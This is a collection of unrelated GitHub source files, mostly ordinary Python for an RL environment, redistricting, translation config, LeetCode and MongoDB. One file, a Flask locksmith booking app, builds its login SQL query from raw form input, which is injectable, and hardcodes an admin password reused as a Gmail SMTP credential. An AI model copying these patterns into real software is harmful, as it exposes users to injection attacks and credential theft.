IR used while training RL (kepp changing)\n self.data_ir = \"./data/\" + path_prefix + self.ir # Original IR (constant)\n subprocess.run([\"cp\", \"./data/target.bc\", self.data_ir])\n subprocess.run([\"cp\", \"./data/target.bc\", self.tmp_ir])\n # subprocess.run([\"rm\", \"./data/target.bc\"])\n\n # Initial values from preprocessing\n self.get_preprocess_values()\n self.used_flag_num = 12\n\n # Action space is flags\n # Value is the index of the FLAG_LIST\n self.action_space = gym.spaces.Box(\n low=0, \n high=(self.TOTAL_FLAG_NUM-1), \n shape=(self.used_flag_num, ), \n dtype=np.int32)\n\n # Observation space is number of features\n # Box is consists of 2 parts\n # 1. 0 ~ FLAG_NUM-1: histogram of used flags\n # 2. FLAG_NUM ~ FLAG_NUM+FEATURE_NUM-1: values for each features\n self.observation_space = gym.spaces.Box(\n low=-1.0,\n high=1.0,\n shape=(self.FEATURE_NUM, ),\n dtype=np.float32)\n\n self.reset()\n\n\n def reset (self):\n \"\"\"\n Reset the state of the environment and returns an initial observation.\n\n Returns\n -------\n observation (object): the initial observation of the space.\n \"\"\"\n self.feature = self.get_feature()\n\n # State is history + feature\n self.state = np.array(self.feature, \n dtype=np.float32)\n self.reward = 0\n self.done = False\n self.info = {}\n\n # Initialize working ir file\n subprocess.run([\"cp\", \"./data/target.bc\", self.data_ir])\n subprocess.run([\"cp\", \"./data/target.bc\", self.tmp_ir])\n\n # Get baseline performance\n self.base_performance = self.get_performance(self.data_ir, \"-no-flag\")\n \n # Episode index (used for when to initialize ir and base performance)\n process = subprocess.Popen([\"stat\", \"-c%s\", self.data_ir], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n self.base_ir_size = int(process.communicate()[0])\n\n self.epsidoe_idx = 0\n\n return self.state\n \n\n def step (self, action):\n \"\"\"\n The agent takes a step in the environment.\n \"\"\"\n\n if DEBUG:\n self.print_feature()\n self.print_action(action)\n\n if self.done:\n # code should never reach this point\n print(\"EPISODE DONE!!!\")\n\n else:\n assert self.action_space.contains(action)\n\n self.state = np.array(self.feature, \n dtype=np.float32)\n self.reward = self.get_reward(action)\n self.done = True\n\n \n # Clear unused workspace\n tmp_dir_lists = os.listdir(\"./tmp\")\n for tmp_dir in tmp_dir_lists: # Empty tmp folders are done folder\n path = \"./tmp/\" + tmp_dir + \"/\"\n try:\n file_modified = datetime.fromtimestamp(os.path.getmtime(path))\n except:\n file_modified = datetime.datetime.now()\n if datetime.datetime.now() - file_modified > datetime.timedelta(seconds=30):\n print(\"Delete \", path)\n try:\n os.rmdir(path)\n except:\n pass\n\n\n # subprocess.run([\"rm\", \"-r\", self.data_path])\n # subprocess.run([\"rm\", \"-r\", self.tmp_path])\n \n\n try:\n assert self.observation_space.contains(self.state)\n except AssertionError:\n print(\"INVALID STATE\", self.state)\n\n return [self.state, self.reward, self.done, self.info]\n\n\n def render (self, mode=\"human\"):\n \"\"\"Renders the environment.\n \"\"\"\n s = \"position: {} reward: {} info: {}\"\n print(s.format(self.state, self.reward, self.info))\n\n\n def close (self):\n pass","repo_name":"jschang0215/RL-TransformPass-Optimization","sub_path":"RL/rl_env/envs/memory_env.py","file_name":"memory_env.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10322176841","text":"import ast\nfrom typing import Callable\n\n\ndef remap(plans, unitmaps, popmap=None) -> Callable:\n \"\"\"\n Re-maps assignments to the specified set of units.\n\n Args:\n plans (DataFrame): The Pandas DataFrame produced by ``tabularized()``.\n unitmaps (dict): A dictionary whose keys are unit types appearing\n in the `unitsType` column, and whose values are dictionaries\n mapping unique identifiers of one set of geometries to unique\n identifiers (or lists of unique identifiers) of another set of\n geometries; these correspond to mappings generated by `unitmap()`\n and the inverse mapping generated by `invert()`.\n popmap (dict, optional): A mapping from unit unique identifiers to\n population values. Only applies when we are mapping from smaller\n units to larger ones.\n\n Returns:\n A function\n \"\"\"\n\n def _(row):\n # Get the assignment for the row.\n assignment = ast.literal_eval(row[\"plan\"])\n\n # Attempt to get the type of units specified by the row; if we\n # can't – i.e.the user didn't specify a unit mapping corresponding\n # to that unit typein `unitmaps` – we leave the assignment alone and warn the user.\n try:\n unitsType = row[\"units\"]\n unitmap = unitmaps[unitsType]\n except BaseException:\n print(f\"No unit mapping provided for {row['units']}; skipping.\")\n return assignment\n\n # What kind of mapping do we have? If `mapping` is from a single key\n # to a single value, then we're mapping units one-to-one (e.g. block\n # IDs to VTD IDs); otherwise, we're mapping units one-to-many (e.g.\n # VTD IDs to blocks). If `mapping` is of the former type, then\n # it's possible that some larger units may comprise smaller units\n # in multiple districts. If this is the case, then we assign larger\n # units to the district in which most of the larger unit's population\n # resides; otherwise, we simply assign all smaller units to whichever\n # district the larger unit's in.\n firstvalue = next(iter(unitmap.values()))\n unitmapdirection = \"down\"\n\n # Mark which kind of mapping we have.\n if isinstance(firstvalue, list):\n unitmapdirection = \"down\"\n else:\n unitmapdirection = \"up\"\n\n # Now, based on the mapping type, return the appropriate mapping.\n if unitmapdirection == \"down\":\n return _down(unitmap, assignment)\n return _up(unitmap, popmap, assignment)\n\n plans[\"plan\"] = plans.apply(_, axis=1)\n return plans\n\n\ndef _down(unitmap, assignment) -> dict:\n \"\"\"\n Maps districting assignments from larger units to smaller\n units (which nest in the larger units).\n\n Args:\n unitmap (dict): Dictionary which maps larger unit identifiers to\n lists of smaller unit identifiers (e.g. VTD identifiers to\n block identifiers).\n assignment (dict): Maps larger unit identifiers to districts.\n\n Returns:\n Maps smaller unit identifiers to districts according to `assignment`.\n \"\"\"\n # Create an empty mapping.\n mapped = {}\n\n # For each of the keys in the provided assignment, get the units to which\n # the keys correspond, and assign them appropriately.\n for bigger, district in assignment.items():\n smallers = unitmap[bigger]\n mapped.update({smaller: district for smaller in smallers})\n\n return mapped\n\n\ndef _up(unitmap, assignment, popmap):\n return assignment\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/data/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23352197759","text":"\r\nAPI_KEY = '' # ключи тут: https://yandex.ru/dev/translate/doc/dg/concepts/api-keys-docpage/\r\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\r\n\r\nfull_text = 'Привет'\r\n\r\nparams = {\r\n 'key': API_KEY,\r\n 'text': full_text,\r\n # 'lang': '{}-{}'.format(from_lang, to_lang)\r\n 'lang': 'ru-en'\r\n }\r\noutput_file = 'output_translate.txt'\r\n","repo_name":"KirillDaX/Task_ADPY4","sub_path":"task_tests2/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25792872567","text":"from flask import Flask, render_template, request, redirect, url_for, flash, g \nfrom handlers import error_pages\nfrom flask_mysqldb import MySQL\nfrom flask import session\nimport smtplib\n\napp = Flask(__name__)\n\napp.register_blueprint(error_pages)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/registro')\ndef registro():\n return render_template('registro.html')\n\n@app.route('/login')\ndef login():\n return render_template('loging.html')\n\n@app.route('/homeusua')\ndef homeusua():\n if not g.user:\n return render_template('peligro.html')\n return render_template('homeusua.html')\n\n@app.route('/consulta')\ndef consulta():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta.html')\n\n@app.route('/consulta-carro')\ndef conscar():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta-carro.html')\n\n@app.route('/consulta-casa')\ndef conscasa():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta-casa.html')\n\n@app.route('/reserva')\ndef reserva():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva.html')\n\n@app.route('/reserva-carro')\ndef reservacar():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva-carro.html')\n\n@app.route('/reserva-casa')\ndef reservacas():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva-casa.html')\n\n@app.route('/homeadmin')\ndef homeadmin():\n if not g.user:\n return render_template('peligro.html')\n elif session['user'] == 'admin':\n return render_template('homeadmin.html')\n else:\n return render_template('peligro.html')\n\n@app.route('/adminres')\ndef adminres():\n if not g.user:\n return render_template('peligro.html')\n return render_template('adminres.html')\n\n@app.route('/admincar')\ndef admincar():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM reservacarro')\n data = cur.fetchall()\n return render_template('adminres-car.html', contacts = data)\n \n\n@app.route('/admincas')\ndef admincas():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM reservacasa')\n data = cur.fetchall()\n return render_template('adminres-cas.html', contacts = data)\n\n@app.route('/admincon')\ndef admincon():\n if not g.user:\n return render_template('peligro.html')\n return render_template('admincon.html')\n\n@app.route('/adminconscar')\ndef adminconscar():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM consultacarro')\n data = cur.fetchall()\n return render_template('admincons-car.html', contacts = data)\n\n@app.route('/adminconscas')\ndef adminconscas():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM consultacasa')\n data = cur.fetchall()\n return render_template('admincons-cas.html', contacts = data)\n\n@app.route('/usuarios')\ndef usuarios():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM usuario')\n data = cur.fetchall()\n return render_template('usuarios.html', contacts = data)\n\n\n\n\n#--- ---- ------ ------ ------- ------- -------- --------- -------- -------- -------\n\n#conexion MySQL\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'cerrajeria'\nmysql = MySQL(app)\n# ----------------- -------------------- ---------------------- ----------------------\n\n#inicio de secion\n\napp.secret_key ='mysecretkey'\n\n@app.route('/')\ndef Index():\n return render_template('registro.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #agregar datos\n\n@app.route('/add_contact', methods = ['POST'])\ndef add_contact():\n\n if request.method == 'POST':\n\n nombre = request.form['nombre']\n apellido = request.form['apellido']\n correo = request.form['correo']\n passw = request.form['passw']\n if (nombre == '' or apellido == '' or correo == '' or passw == ''):\n flash('¡ Campos vacios !')\n return render_template('registro.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO usuario (nombre, apellido, correo, pass) VALUES (%s, %s, %s, %s)', (nombre, apellido, correo, passw))\n mysql.connection.commit()\n flash('Usuario registrado')\n return render_template('loging.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n # comparacion de datos\n\n@app.route('/loginz', methods = ['GET', 'POST'])\ndef loginz():\n error = None\n if request.method == 'POST':\n session.pop('user', None)\n\n session['user'] = request.form['correo']\n passw = request.form['pass']\n if (session['user'] == 'linacerrajeria@gmail.com' and passw == 'Asdf1234zxcv'):\n session['user']='admin'\n return redirect(url_for('protected'))\n else:\n if (session['user'] == 'linacerrajeria@gmail.com' and passw != 'Asdf1234zxcv' ):\n flash('Hola Administrador, tu contraseña es incorrecta')\n return redirect(url_for('login'))\n\n cur = mysql.connection.cursor()\n user = session['user'] \n filas = cur.execute(f'SELECT * FROM usuario where correo = \"{user}\" and pass = \"{passw}\"')\n session['user'] = user\n mysql.connection.commit()\n\n if filas == 0 :\n #request.form['Username'] != 'correo' or request.form['Password'] != 'pass':\n error = 'Datos invalido'\n flash('Correo o contraseña invalida')\n else:\n return redirect(url_for('protected1'))\n \n return render_template('loging.html', error=error)\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Sesion\n\n@app.route('/protected')\ndef protected():\n if g.user:\n flash('Administrador')\n return render_template('homeadmin.html')\n\n return redirect(url_for('home'))\n\n@app.before_request\ndef before_request():\n g.user = None\n if 'user' in session:\n g.user = session['user']\n\n\n@app.route('/getsession')\ndef getsession():\n if 'user' in session:\n return session['user']\n\n return 'No estas iniciando'\n\n@app.route('/dropsession')\ndef dropsession():\n session.pop('user', None)\n return 'Tramposo!'\n\n@app.route('/logout')\ndef logout():\n if session['user'] == 'admin':\n session['admin']=''\n session.pop('user', None)\n flash('Cerro sesión')\n return redirect(url_for('home'))\n\n@app.route('/protected1')\ndef protected1():\n if g.user:\n flash(g.user)\n return render_template('homeusua.html')\n return redirect(url_for('home'))\n\n@app.route('/logout1')\ndef logout1():\n session.pop('user', None)\n flash('Cerro sesión')\n return redirect(url_for('home'))\n#--- ---- ---- ---- ----- ------ ------- ------ ----- ------ --------- ------ ------ ------- ------ ------ \n\n #Insertar datos a MYSQL\n\n@app.route('/reservacarro', methods = ['POST'])\ndef reservacarro():\n\n if request.method == 'POST':\n\n Marca = request.form['Marca']\n Modelo = request.form['Modelo']\n Ubicacion = request.form['Ubicacion']\n Correo = request.form['Correo']\n Tipo_trabajo = request.form['Tipo_trabajo']\n Fecha = request.form['Fecha']\n if (Marca == '' or Modelo == '' or Ubicacion == '' or Correo == '' or Tipo_trabajo == '' or Fecha == ''):\n flash('Campos vacios')\n return render_template('reserva-carro.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO reservacarro (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo, Fecha) VALUES (%s, %s, %s, %s, %s, %s)', (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo, Fecha))\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n # Aviso al correo\n\n message = 'Tienes una reserva para un auto, revise los datos del cliente en el sitio web'\n subject = 'RESERVA PARA AUTO'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n mysql.connection.commit()\n flash('¡Reserva registrada!')\n return render_template('homeusua.html')\n\n@app.route('/reservacasa', methods = ['GET', 'POST'])\ndef reservacasa():\n\n if request.method == 'POST':\n\n Domicilio = request.form['Domicilio']\n Numero = request.form['Numero']\n Correo = request.form['Correo']\n Referencia = request.form['Referencia']\n Tipo_trabajo = request.form['Tipo_trabajo']\n Fecha = request.form['Fecha']\n if (Domicilio == '' or Numero == '' or Correo == '' or Referencia == '' or Tipo_trabajo == '' or Fecha == ''):\n flash('Campos vacios')\n return render_template('reserva-casa.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO reservacasa (Domicilio, Numero, Correo, Referencias, Tipo_trabajo, Fecha) VALUES (%s, %s, %s, %s, %s, %s)', (Domicilio, Numero, Correo, Referencia, Tipo_trabajo, Fecha))\n \n # Aviso al correo\n message = 'Tienes una reserva para una casa, revise los datos del cliente en el sitio web'\n subject = 'RESERVA PARA CASA'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n\n mysql.connection.commit()\n flash('¡Reserva registrada!') \n return render_template('homeusua.html')\n\n@app.route('/consultacarro', methods = ['GET', 'POST'])\ndef consultacarro():\n\n if request.method == 'POST':\n\n\n Marca = request.form['marca']\n Modelo = request.form['Modelo']\n Ubicacion = request.form['Ubicacion']\n Correo = request.form['Correo']\n Tipo_trabajo = request.form['Tipo_trabajo']\n if (Modelo == '' or Marca == '' or Ubicacion == '' or Correo == '' or Tipo_trabajo == ''):\n flash('Campos vacios')\n return render_template('consulta-carro.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO consultacarro (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo) VALUES (%s, %s, %s, %s, %s)', (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo))\n \n # Aviso al correo\n message = 'Tienes una consulta para una casa, revise los datos del cliente en el sitio web'\n subject = 'CONSULTA PARA CARRO'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n \n mysql.connection.commit()\n flash('¡Consulta registrada!') \n return render_template('homeusua.html')\n\n@app.route('/consultacasa', methods = ['GET', 'POST'])\ndef consultacasa():\n\n if request.method == 'POST':\n\n Domicilio = request.form['Domicilio']\n Numero = request.form['Numero']\n Correo = request.form['Correo']\n Referencia = request.form['Referencia']\n Tipo_trabajo = request.form['Tipo_trabajo']\n if (Domicilio == '' or Numero == '' or Correo == '' or Referencia == '' or Tipo_trabajo == ''):\n flash('Campos vacios')\n return render_template('consulta-casa.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO consultacasa (Domicilio, Numero, Correo, Referencias, Tipo_trabajo) VALUES (%s, %s, %s, %s, %s)', (Domicilio, Numero, Correo, Referencia, Tipo_trabajo))\n \n # Aviso al correo\n message = 'Tienes una consulta para una casa, revise los datos del cliente en el sitio web'\n subject = 'CONSULTA PARA CASA'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n \n mysql.connection.commit()\n flash('¡Consulta registrada!') \n print('hola') \n return render_template('homeusua.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Borrar datos de MYSQL\n\n@app.route('/delete/')\ndef delete_contact(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM reservacarro WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('admincar'))\n\n@app.route('/delete1/')\ndef delete_contact1(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM reservacasa WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('admincas'))\n\n@app.route('/delete2/')\ndef delete_contact2(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM consultacarro WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('adminconscar'))\n\n@app.route('/delete3/')\ndef delete_contact3(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM consultacasa WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('adminconscas'))\n\n@app.route('/delete4/')\ndef delete_contact4(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM usuario WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('usuarios'))\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Denegar accesos\n\n\n\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Tzintzunjhonna/cerrajeria","sub_path":"cerr.py","file_name":"cerr.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42600829073","text":"'''\nhttps://leetcode.com/problems/add-strings/\nRuntime: 392 ms, faster than 5.24% of Python3 online submissions for Add Strings.\nMemory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Add Strings.\n'''\n\nclass Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n int1, int2 = 0, 0\n len1, len2 = len(num1), len(num2)\n \n for i in range(len1):\n int1 += (ord(num1[i]) - 48) * pow(10,(len1 - 1) - i)\n\n for i in range(len2):\n int2 += (ord(num2[i]) - 48) * pow(10,(len2 - 1) - i)\n \n return str(int1 + int2)","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/easy/415_add_strings/django.py","file_name":"django.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"41109667861","text":"import pymongo\nfrom enum1 import Status\nfrom dotenv import load_dotenv\nimport os \n\nload_dotenv()\nlink=os.getenv(\"mongodb\")\nclient=pymongo.MongoClient(link)\ndb =client['Job_search']\njob=db['total_jobs']\napplyjobs=db['applied_jobs']\nlogin=db['login_details']\nstatus=db['status_details']\n\n\n\ndef create_job(data):\n data=dict(data)\n job.insert_one(data)\n\ndef apply_job(data):\n data=dict(data)\n applyjobs.insert_one(data)\n status.insert_one(\n { \"name\" : data[\"name\"],\n \"status\" : Status.under_process}\n )\n\n \n\n","repo_name":"kasojusrujan/Job_application_with_Fastapi","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8795416150","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy.linalg import norm\nfrom scipy.spatial import distance\nfrom scipy.spatial.transform import Rotation as Kabsch\n\nfrom Cube import read_cube\n\nBOHR_TO_ANGSTROM = 0.529177\n\n\ndef angle(a, b, c):\n ba = a - b\n bc = c - b\n cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n a3 = np.degrees(np.arccos(cosine_angle))\n return a3\n\n\n# This is the straightforward approach as outlined in the answers to\n# \"How do I calculate a dihedral angle given Cartesian coordinates?\"\ndef dihedral2(p):\n b = p[:-1] - p[1:]\n b[0] *= -1\n v = np.array([v - (v.dot(b[1]) / b[1].dot(b[1])) * b[1] for v in [b[0], b[2]]])\n # Normalize vectors\n v /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1, 1)\n b1 = b[1] / np.linalg.norm(b[1])\n x = np.dot(v[0], v[1])\n m = np.cross(v[0], b1)\n y = np.dot(m, v[1])\n return np.degrees(np.arctan2(y, x))\n\n\ndef read_cube_file(filepath):\n pcube_data, pcube_meta = read_cube(filepath)\n ap = []\n an = []\n for i in pcube_meta[\"atoms\"]:\n atom = list(i[1])\n ap.append([x * BOHR_TO_ANGSTROM for x in atom[1:]])\n an.append(atom[1])\n return ap, an\n\n\ndef read_mdcm_xyz(filepath):\n xyz_file = open(filepath).readlines()\n n_charges = int(xyz_file[0])\n # read number of charges from first line (xyz format)\n charge_lines = xyz_file[2:n_charges + 2]\n # Read atoms and charges\n c_positions = []\n c_charges = []\n for charge in charge_lines:\n on, x, y, z, c = charge.split()\n c_positions.append([float(x), float(y), float(z)])\n c_charges.append(float(c))\n return c_positions, c_charges\n\n\ndef get_local_axis(atom_pos, frame_atoms, method=\"bond\"):\n \"\"\"\n method: \"bond\" z-axis a-b\n \"bisector\" z-axis = bisector of a-b,b-c\n Inputs:\n atom_positions, frames\n Returns:\n List of Lists of Frame Vectors [ [x_v, y_v, z_v], ... ] in order of frames\n \"\"\"\n n_frames = len(frame_atoms)\n frame_vectors = []\n for f in range(n_frames):\n a_index, b_index, c_index = frame_atoms[f]\n a, b, c = frame_atoms[f]\n # adjust indexing\n a = atom_pos[a - 1]\n b = atom_pos[b - 1]\n c = atom_pos[c - 1]\n distance_ab = distance.euclidean(a, b)\n b1_x = (a[0] - b[0]) / distance_ab\n b1_y = (a[1] - b[1]) / distance_ab\n b1_z = (a[2] - b[2]) / distance_ab\n\n distance_bc = distance.euclidean(c, b)\n b2_x = (c[0] - b[0]) / distance_bc\n b2_y = (c[1] - b[1]) / distance_bc\n b2_z = (c[2] - b[2]) / distance_bc\n\n # Z axes\n ez1 = np.array([b1_x, b1_y, b1_z])\n ez3 = np.array([b2_x, b2_y, b2_z])\n\n if method == \"bond\":\n ez2 = np.array([b1_x, b1_y, b1_z])\n\n elif method == \"bisector\":\n \"\"\" Calculate Z(2) as bisector\n \"\"\"\n bi_x = ez1[0] + ez3[0]\n bi_y = ez1[1] + ez3[1]\n bi_z = ez1[2] + ez3[2]\n\n # get norm\n r_bi = np.sqrt(bi_x ** 2 + bi_y ** 2 + bi_z ** 2)\n # normalize\n ez2 = np.array([bi_x, bi_y, bi_z]) / r_bi\n\n if r_bi < 0.0001:\n print(\"Colinearity detected! (Bad)\")\n\n else:\n assert False, \"No valid method supplied!\"\n\n # Y axes\n ey1 = np.zeros(3)\n ey1[0] = b1_y * b2_z - b1_z * b2_y\n ey1[1] = b1_z * b2_x - b1_x * b2_z\n ey1[2] = b1_x * b2_y - b1_y * b2_x\n re_x = np.sqrt(ey1[0] ** 2 + ey1[1] ** 2 + ey1[2] ** 2)\n\n # left handed axes system\n ey1[0] = -1 * ey1[0] / re_x\n ey1[1] = -1 * ey1[1] / re_x\n ey1[2] = -1 * ey1[2] / re_x\n\n ey2 = ey1.copy()\n ey3 = ey1.copy()\n\n # X axes\n # ex1 and ex2\n ex1 = np.cross(ey1, ez1)\n if method == \"bond\":\n ex2 = ex1.copy()\n else:\n ex2 = np.cross(ey2, ez2)\n # ex3\n ex3 = np.cross(ey3, ez3)\n frame_vectors.append((np.array([ex1, -1 * ey1, ez1]),\n np.array([ex2, -1 * ey2, ez2]),\n np.array([ex3, -1 * ey3, ez3])))\n\n # print(frame_vectors[-1])\n\n return frame_vectors\n\n\ndef save_charges(charge_positions, charges, filename=\"out_charges.xyz\"):\n print(filename)\n file = open(filename, \"w\")\n file.write(\"{}\\n\".format(len(charge_positions)))\n file.write(\"s x[A] y[A] z[A] \"\n \" q[e]\\n\")\n c = 1\n for xyz, q in zip(charge_positions, charges):\n c += 1\n if q < 0:\n letter = \"O\"\n else:\n letter = \"N\"\n file.write(\"{0:} {1:.16f} {2:.16f} {3:.16f} {4:.16f}\\n\".format(letter, xyz[0],\n xyz[1], xyz[2], float(q)))\n file.close()\n\n\nclass ARS():\n def __init__(self, xyz_file_name, pcube, frame_file, pcube_2=None, method=\"bond\", atom_charge_match=None):\n self.method = method\n self.c_positions_local = None\n self.c_positions_global = None\n self.atom_positions = None\n self.atom_positions_plus = None\n\n # Open XYZ file\n self.c_positions, self.c_charges = read_mdcm_xyz(xyz_file_name)\n self.n_charges = len(self.c_charges)\n\n # Open Cube files\n self.atom_positions, self.atom_names = read_cube_file(pcube)\n self.n_atoms = len(self.atom_names)\n\n if pcube_2 is not None:\n self.atom_positions_plus, atom_names = read_cube_file(pcube_2)\n self.n_atoms_2 = len(atom_names)\n\n # Test for consistency\n # self.test()\n\n # Get frames\n self.frame = open(frame_file).readlines()\n self.frame_atoms = []\n self.frames = self.frame[1:]\n self.n_frames = len(self.frames)\n for f in self.frames:\n _s = f.split()\n a1 = f.split()[0]\n a2 = f.split()[1]\n a3 = f.split()[2]\n self.frame_atoms.append([int(a1), int(a2), int(a3)])\n\n # Match charges to closest atoms\n if atom_charge_match is None:\n self.charge_atom_associations, self.atom_charge_dict = self.match_charges()\n self.save_charge_atom_associations()\n else:\n self.read_charge_atom_associations(atom_charge_match)\n\n # print(self.charge_atom_associations)\n # print(self.match_charges()[0])\n\n # Calculate local axes and transform charges\n # Calculate the new axes for each frame\n self.atom_positions = np.array(self.atom_positions)\n\n if pcube_2 is not None:\n self.atom_positions_plus = np.array(self.atom_positions_plus)\n\n self.frame_vectors = get_local_axis(self.atom_positions, self.frame_atoms, method=self.method)\n\n if pcube_2 is not None:\n self.frame_vectors_plus = get_local_axis(self.atom_positions_plus, self.frame_atoms, method=self.method)\n\n self.c_positions_local = self.global_to_local()\n\n if pcube_2 is not None:\n self.charge_positions_plus = self.local_to_global()\n\n def save_charge_atom_associations(self, filename=\"out.acd\"):\n f = open(filename+\".acd\", \"w\")\n for charge, atom in self.charge_atom_associations:\n f.write(f\"{charge} {atom} \\n\")\n f.close()\n\n def read_charge_atom_associations(self, path):\n f = open(path).readlines()\n charge_atom_associations = []\n atom_charge_dict = {}\n for i, line in enumerate(f):\n c, a = line.split()\n c_a = [int(c), int(a)]\n charge_atom_associations.append(c_a)\n c = c_a[0]\n a = c_a[1]\n if a not in atom_charge_dict:\n atom_charge_dict[a] = [c]\n else:\n atom_charge_dict[a].append(c)\n self.charge_atom_associations = charge_atom_associations\n self.atom_charge_dict = atom_charge_dict\n\n def get_angle(self, a, b, c):\n atoms = self.atom_positions\n p = np.array([atoms[a], atoms[b], atoms[c]])\n return angle(*p)\n\n def get_dih(self, a, b, c, d):\n atoms = self.atom_positions\n p = np.array([atoms[a], atoms[b], atoms[c], atoms[d]])\n return dihedral2(p)\n\n def get_dih_2(self, a, b, c, d):\n atoms = self.atom_positions_plus\n p = np.array([atoms[a], atoms[b], atoms[c], atoms[d]])\n return dihedral2(p)\n\n # def align_in_global(self, filename_template=None):\n # self.rotation, rmsd = Kabsch.align_vectors(self.atom_positions, self.atom_positions_plus)\n # self.rotation = self.rotation.as_matrix()\n # tmp_atom_positions = self.rotation.dot(self.atom_positions.T).T\n # if filename_template is None:\n # save_xyz(tmp_atom_positions, self.atom_names)\n # else:\n # save_xyz(tmp_atom_positions, self.atom_names, filename=filename_template.format(\"molecule\"))\n # tmp_charge_positions = self.rotation.dot(self.c_positions.T).T\n # if filename_template is None:\n # save_charges(tmp_charge_positions, self.c_charges)\n # else:\n # save_charges(tmp_charge_positions, self.c_charges, filename=filename_template.format(\"charges\"))\n #\n # print(rmsd)\n\n def get_c_positions_local(self):\n return self.c_positions_local\n\n def plot1(self):\n plot_labels = False\n plot_pos_1 = True\n plot_pos_2 = True\n plot_vectors = False\n\n fig = plt.figure()\n ax = Axes3D(fig, elev=0, 